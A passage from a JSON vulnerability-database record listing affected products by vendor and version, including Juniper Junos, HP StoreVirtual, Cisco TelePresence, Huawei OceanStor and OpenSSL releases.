"ive os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace u2980 v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "intelligent management center", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "switch series (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10500v7)0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 11.4r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "s7700\u0026s9700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ecns600 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oceanstor s2600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u19** v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.2" }, { "model": "spa500 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.4" }, { "model": "universal small cell series software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.20" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.5" }, { "model": "paging server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "project openssl 1.0.1h", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "oceanstor s5600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9500e family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "ace application control engine module ace20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "msr30-16 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.2" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "f5000 c", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.1880" }, { "model": "hyperdp oceanstor n8500 v200r001c09", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.10" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.2354" }, { "model": "agent desktop for cisco unified contact center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "toolscenter suite", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.53" }, { "model": "f5000 s", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "simatic s7-1500", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "telepresence ip vcr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "msr20-1x russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "unified communications series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "si switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55000" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "ape", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "hyperdp v200r001c91spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.1" }, { "model": "unified attendant console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security threat response manager 2012.1r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "dsr-500 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "s3900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "documentum content server sp1 p26", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.1" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.6" }, { "model": "junos 12.1x44-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security information and event management hf11", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.3.2" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "ftp server", "scope": "ne", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.3" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "junos 12.1x45-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "eupp v100r001c01spc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ace application control engine module ace10", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "20" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.4" }, { "model": "junos 10.4s15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ecns600 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "36100" }, { "model": "junos 13.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ive os 7.4r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hi switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55000" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "msr30-1x russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.7" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "oceanstor s2600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "msr9xx family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "msr2000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "10.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.2" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.12" }, { "model": "msr30 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "manageone v100r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463011.5" }, { "model": "junos 12.2r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ave2000 v100r001c00sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security information and event management ga", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.4.0" }, { "model": "svn2200 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125000" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "esight-ewl v300r001c10spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ave2000 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.4" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "tsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "msr30-16 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "usg9500 v300r001c01spc300", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "imc ead", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.00" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3600v20" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "fortios b064", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-1" }, { "model": "documentum content server sp2 p15", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "10.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.3" }, { "model": "usg9500 v300r001c20sph102", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "fortios", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.8" }, { "model": "asa cx context-aware security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "msr4000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "unified im and presence services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 12.2r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.21" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "usg9300 v200r001c01sph902", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gv200", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6" }, { "model": "elog v100r003c01spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "anyoffice v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.5" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "hardware management console release", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v77.6" }, { "model": "vpn client v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "metro ethernet series access devices", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "12000" }, { "model": "mcp russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66000" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.1" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.2" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "s5900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s6900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ecns610 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.1" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "a6600 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "junos 12.1r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "f5000 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "19100" }, { "model": "fusionsphere v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.1" }, { "model": "usg9500 usg9500 v300r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tsm v100r002c07spc219", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "espace u2990 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "espace iad v300r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos r11", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "ace application control engine appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "documentum content server sp1 p28", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.3" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "66020" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4x27.62" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "oceanstor s5600t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x47" }, { "model": "security network intrusion prevention system gx7412-10", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "espace iad v300r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "pk family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1810v10" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "junos os 13.3r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59200" }, { "model": "oceanstor s6800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "manageone v100r001c02 spc901", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 11.4r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-2" }, { "model": "project openssl 1.0.0m", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 12.1x45-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.6.1" }, { "model": "oceanstor s2600t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dsr-500n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "security network intrusion prevention system gx5008-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "s2750\u0026s5700\u0026s6700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s5800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "4210g switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "oceanstor s5800t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "isoc v200r001c02spc202", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "ons series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154000" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nip2000\u00265000 v100r002c10spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hyperdp v200r001c09spc501", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "webapp secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.8.0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.7.0" }, { "model": "security threat response manager", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "eupp v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ei switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55000" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "junos 13.1r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "dsr-500 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "policy center v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "junos d15", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x45-" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "junos os 12.1x47-d15", "scope": "ne", "trust": 0.3, 